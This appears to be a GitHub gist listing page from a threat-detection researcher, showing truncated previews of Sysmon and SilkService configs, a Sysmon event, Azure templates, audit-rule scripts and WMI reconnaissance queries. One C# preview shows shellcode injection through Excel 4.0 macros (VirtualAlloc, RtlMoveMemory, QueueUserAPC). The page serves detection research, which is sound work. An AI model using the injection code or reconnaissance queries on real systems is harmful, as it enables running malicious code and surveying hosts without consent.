- The .NET Runtime Event Provider requires setting COMPLUS_ETWEnabled=1 in your process' environment.
- CLRConfig will look for configurations in the following places in the following order:
- Look at environment variables (prepending COMPlus_ to the name)
- Look at the framework registry keys (
HKCU\Software\Microsoft\.NETFramework
- Look at the framework registry keys
HKLM\Software\Microsoft\.NETFramework
)
- These can be set in the following ways:
- Setting the environment variable COMPlus_:
- Windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var memaddr = Convert.ToDouble(excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"VirtualAlloc\\",\\"JJJJJ\\"," + lpAddress + "," + shellcode.Length + ",4096,64)" })); | |
var startaddr = memaddr; | |
foreach (var b in shellcode) { | |
var cb = String.Format("CHAR({0})", b); | |
var macrocode = "CALL(\\"Kernel32\\",\\"RtlMoveMemory\\",\\"JJCJ\\"," + memaddr + "," + cb + ",1)"; | |
excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { macrocode }); | |
memaddr++; | |
} | |
excel.GetType().InvokeMember("ExecuteExcel4Macro", BindingFlags.InvokeMethod, null, excel, new object[] { "CALL(\\"Kernel32\\",\\"QueueUserAPC\\",\\"JJJJ\\"," + startaddr + ", -2, 0)" }); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Sysmon schemaversion="4.32"> | |
<!-- Capture all hashes --> | |
<HashAlgorithms>*</HashAlgorithms> | |
<DnsLookup>False</DnsLookup> | |
<ArchiveDirectory>Archive</ArchiveDirectory> | |
<EventFiltering> | |
<RuleGroup name="" groupRelation="or"> | |
<!-- Event ID 1 == Process Creation. Log all newly created processes except --> | |
<ProcessCreate onmatch="exclude"> | |
<Image condition="contains">splunk</Image> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"> | |
- <System> | |
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> | |
<EventID>1</EventID> | |
<Version>5</Version> | |
<Level>4</Level> | |
<Task>1</Task> | |
<Opcode>0</Opcode> | |
<Keywords>0x8000000000000000</Keywords> | |
<TimeCreated SystemTime="2018-07-06T12:55:22.864710300Z" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", | |
"contentVersion": "1.0.0.0", | |
"parameters": { | |
"utcValue": { | |
"type": "string", | |
"defaultValue": "[utcNow()]", | |
"metadata": { | |
"description": "Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used" | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", | |
"contentVersion": "1.0.0.0", | |
"parameters": { | |
"utcValue": { | |
"type": "string", | |
"defaultValue": "[utcNow()]", | |
"metadata": { | |
"description": "Returns the current (UTC) datetime value in the specified format. If no format is provided, the ISO 8601 (yyyyMMddTHHmmssZ) format is used" | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- | |
SilkService Config | |
Author: Roberto Rodriguez (@Cyb3rWard0g) | |
License: GPL-3.0 | |
Version: 0.0.1 | |
References: https://github.com/Cyb3rWard0g/mordor/blob/master/environments/windows/configs/erebor/erebor_SilkServiceConfig.xml | |
--> | |
<SilkServiceConfig> | |
<!-- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
SELECT System.ItemPathDisplay,System.FileOwner,System.Size,System.DateCreated,System.DateAccessed,System.Search.Autosummary FROM SystemIndex WHERE Contains(*, '""*{0}*""') AND SCOPE = '{1}' AND (System.FileExtension = '.txt' OR System.FileExtension = '.doc' OR System.FileExtension = '.docx' OR System.FileExtension = '.ppt' OR System.FileExtension = '.pptx' OR System.FileExtension = '.xls' OR System.FileExtension = '.xlsx' OR System.FileExtension = '.ps1' OR System.FileExtension = '.vbs' OR System.FileExtension = '.config' OR System.FileExtension = '.ini')" | |
SELECT * FROM win32_networkconnection" | |
Select * from Win32_ComputerSystem" | |
SELECT * FROM Win32_DeviceGuard" | |
SELECT * FROM win32_service" | |
SELECT * FROM AntiVirusProduct" | |
SELECT * FROM MSFT_DNSClientCache" | |
SELECT ProcessId, ExecutablePath, CommandLine FROM Win32_Process" | |
SELECT * FROM Win32_Process" | |
SELECT * FROM Win32_Process WHERE SessionID != 0" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Download https://github.com/OTRF/Set-AuditRule/blob/master/Set-AuditRule.ps1 | |
Import-Module .\Set-AuditRule.ps1 | |
$AuditRules = @" | |
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\JD";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Skew1";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\GBG";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Data";"Authenticated Users";"QueryValues";"None";"None";"Success" | |
"@ |
NewerOlder